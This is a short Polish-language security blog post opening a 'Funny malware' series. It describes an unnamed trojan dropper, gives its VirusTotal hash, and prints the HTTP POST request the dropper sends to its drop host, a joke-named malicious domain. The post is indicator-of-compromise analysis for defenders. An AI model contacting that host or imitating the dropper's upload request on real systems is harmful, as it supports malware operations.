Tak jak obiecałem wrzucam pierwszy post z cyklu “Funny malware” :).
Na pierwszy ogień idzie dropper bez konkretniejszej nazwy ponieważ mutacje tego typu trojanów jest tak duzo ,że ludzie od sygnature nie wyrabiają:D.
Osobnik zasłużył sobie na miejsce w tej katogorii nietuźnikową domeną dla drop hosta:
VT: 55efe2ff0338c0abe5b1a978a138913f
POST /CENZURA.php HTTP/1.1
Referer: SAS
Content-Type: multipart/form-data; boundary=7d615b161b064a
User-Agent: A
Host: hassomeonelostininter.net
Content-Length: 384
Cache-Control: no-cache
hassomeonelostininter.net
HAS SOMEONE LOST IN INTERNET
No tak interes się kręci 😀 to i panowie pozwalają sobie na żarty w postaci takich domen..hehhe:)
Btw:Interesujący filmik ,który gdzieś w sieci wygrzebał Borys prezentujący akcje policji podaczas nalotu na dom skimmerów/carderów:
Zobacz->Video
Tym paną zdecydownie nie bylo już do śmiechu :).
PS:Greetz to Emi aka ‘alwaro’ for sample.
Recent Comments